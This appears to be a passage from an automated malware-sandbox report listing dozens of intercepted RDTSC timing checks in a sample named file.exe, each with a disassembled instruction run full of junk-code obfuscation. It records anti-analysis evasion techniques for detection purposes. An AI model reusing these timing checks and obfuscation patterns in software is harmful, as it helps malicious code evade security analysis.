              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9080B5 second address: 9080D8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE52CBFFE24h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FE52CBFFE1Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9080D8 second address: 9080DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 909F91 second address: 90A029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FE52CBFFE29h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FE52CBFFE18h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b mov bl, dh 0x0000002d push 00000000h 0x0000002f mov edi, 678B1D5Dh 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edi 0x00000039 call 00007FE52CBFFE18h 0x0000003e pop edi 0x0000003f mov dword ptr [esp+04h], edi 0x00000043 add dword ptr [esp+04h], 0000001Bh 0x0000004b inc edi 0x0000004c push edi 0x0000004d ret 0x0000004e pop edi 0x0000004f ret 0x00000050 jmp 00007FE52CBFFE21h 0x00000055 xchg eax, esi 0x00000056 push eax 0x00000057 push edx 0x00000058 push edi 0x00000059 pushad 0x0000005a popad 0x0000005b pop edi 0x0000005c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 909135 second address: 90915E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 jmp 00007FE52CC9523Ah 0x0000000b pop ebx 0x0000000c popad 0x0000000d push eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE52CC95243h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90915E second address: 909162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90BF61 second address: 90BF7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE52CC95245h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90BF7A second address: 90BF97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FE52CBFFE27h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90C577 second address: 90C5E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC9523Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FE52CC95238h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007FE52CC95238h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 00000014h 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 sub di, 8C1Eh 0x00000047 push 00000000h 0x00000049 mov edi, dword ptr [ebp+122D18EBh] 0x0000004f xchg eax, esi 0x00000050 push eax 0x00000051 push edx 0x00000052 ja 00007FE52CC95238h 0x00000058 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90A153 second address: 90A157 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90A157 second address: 90A15D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90C761 second address: 90C767 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4323 second address: 8B4327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4327 second address: 8B432B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90C767 second address: 90C76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90C76B second address: 90C76F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B432B second address: 8B4331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4331 second address: 8B4336 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90C82A second address: 90C834 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE52CC9523Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AD7E5 second address: 8AD810 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE52CBFFE16h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE52CBFFE29h 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AD810 second address: 8AD82C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC95245h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 913A37 second address: 913A5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FE52CBFFE1Eh 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91B604 second address: 91B621 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE52CC95236h 0x00000008 jmp 00007FE52CC9523Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007FE52CC95242h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91B621 second address: 91B631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FE52CBFFE16h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91AF17 second address: 91AF1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91B20F second address: 91B242 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FE52CBFFE21h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92066E second address: 9206A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FE52CC9523Eh 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 js 00007FE52CC95238h 0x00000019 je 00007FE52CC95238h 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92084D second address: 9208C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE52CBFFE1Fh 0x00000008 je 00007FE52CBFFE16h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007FE52CBFFE27h 0x0000001a mov eax, dword ptr [eax] 0x0000001c pushad 0x0000001d jmp 00007FE52CBFFE21h 0x00000022 jmp 00007FE52CBFFE27h 0x00000027 popad 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FE52CBFFE1Bh 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9208C0 second address: 9208CA instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE52CC9523Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 924E1D second address: 924E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925088 second address: 92508C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92508C second address: 925096 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE52CBFFE16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9251B2 second address: 9251B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9251B8 second address: 9251E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FE52CBFFE22h 0x0000000f js 00007FE52CBFFE16h 0x00000015 jnc 00007FE52CBFFE16h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92534E second address: 92535B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 js 00007FE52CC9523Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92535B second address: 92535F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92535F second address: 925365 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925744 second address: 92577F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FE52CBFFE1Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE52CBFFE28h 0x00000013 jmp 00007FE52CBFFE1Dh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92590C second address: 925910 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925910 second address: 925927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FE52CBFFE1Fh 0x0000000c pop ecx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925927 second address: 925940 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE52CC95243h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925940 second address: 92596B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007FE52CBFFE2Bh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92596B second address: 925973 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925973 second address: 92597B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92A14F second address: 92A154 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92A154 second address: 92A178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE52CBFFE1Ah 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE52CBFFE1Dh 0x00000011 ja 00007FE52CBFFE16h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 928FB5 second address: 928FD9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE52CC95236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE52CC95247h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F5EBB second address: 8D380E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FE52CBFFE27h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FE52CBFFE1Ch 0x00000011 nop 0x00000012 call dword ptr [ebp+122D2587h] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b jc 00007FE52CBFFE16h 0x00000021 pop eax 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 pushad 0x00000026 popad 0x00000027 jmp 00007FE52CBFFE20h 0x0000002c popad 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F5FB6 second address: 8F6085 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE52CC9524Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FE52CC95238h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov ecx, 2291FF96h 0x0000002a push dword ptr fs:[00000000h] 0x00000031 mov edx, dword ptr [ebp+122D3972h] 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e push 00000000h 0x00000040 push ebx 0x00000041 call 00007FE52CC95238h 0x00000046 pop ebx 0x00000047 mov dword ptr [esp+04h], ebx 0x0000004b add dword ptr [esp+04h], 00000014h 0x00000053 inc ebx 0x00000054 push ebx 0x00000055 ret 0x00000056 pop ebx 0x00000057 ret 0x00000058 add edi, dword ptr [ebp+122D3A2Eh] 0x0000005e mov dword ptr [ebp+12489C61h], esp 0x00000064 jmp 00007FE52CC9523Eh 0x00000069 cld 0x0000006a cmp dword ptr [ebp+122D3A5Ah], 00000000h 0x00000071 jne 00007FE52CC952E9h 0x00000077 sub dword ptr [ebp+1247A522h], eax 0x0000007d sub edx, dword ptr [ebp+122D3AEAh] 0x00000083 mov byte ptr [ebp+122D2E42h], 00000047h 0x0000008a mov di, CBF8h 0x0000008e mov edx, dword ptr [ebp+122D2723h] 0x00000094 mov eax, D49AA7D2h 0x00000099 add ecx, dword ptr [ebp+12451682h] 0x0000009f push eax 0x000000a0 push eax 0x000000a1 push edx 0x000000a2 jg 00007FE52CC95238h 0x000000a8 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F63C3 second address: 8F63C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F63C7 second address: 8F63D8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 je 00007FE52CC9523Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F65AB second address: 8F65B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F661E second address: 8F662C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE52CC9523Ah 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F662C second address: 8F6630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6630 second address: 8F6686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FE52CC95247h 0x0000000e xchg eax, esi 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FE52CC95238h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 nop 0x0000002a pushad 0x0000002b push esi 0x0000002c pushad 0x0000002d popad 0x0000002e pop esi 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FE52CC95241h 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6686 second address: 8F6698 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE52CBFFE16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6698 second address: 8F66A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC9523Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6789 second address: 8F678E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6D62 second address: 8F6D66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6D66 second address: 8F6D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FE52CBFFE1Ch 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE52CBFFE1Eh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6ECA second address: 8F6ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7094 second address: 8F709C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F709C second address: 8F70A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F70A2 second address: 8F70AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F70AF second address: 8F70B9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE52CC95236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F70B9 second address: 8F70D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F71DF second address: 8F71E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9293E7 second address: 9293EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9293EF second address: 92940A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FE52CC95236h 0x00000009 jmp 00007FE52CC95240h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92940A second address: 929434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FE52CBFFE28h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jp 00007FE52CBFFE24h 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 929434 second address: 92943A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 929597 second address: 9295AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE52CBFFE22h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9295AF second address: 9295B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9295B8 second address: 9295D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9295D6 second address: 9295EE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE52CC9523Eh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92973F second address: 92975E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE52CBFFE25h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92975E second address: 929762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9298C0 second address: 9298C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9298C4 second address: 9298FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC95247h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FE52CC9524Fh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 929A5C second address: 929A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 929BB5 second address: 929BBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 929BBE second address: 929BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 929D00 second address: 929D0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FE52CC95236h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 929D0E second address: 929D12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92FC04 second address: 92FC1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE52CC95247h 0x00000009 rdtsc
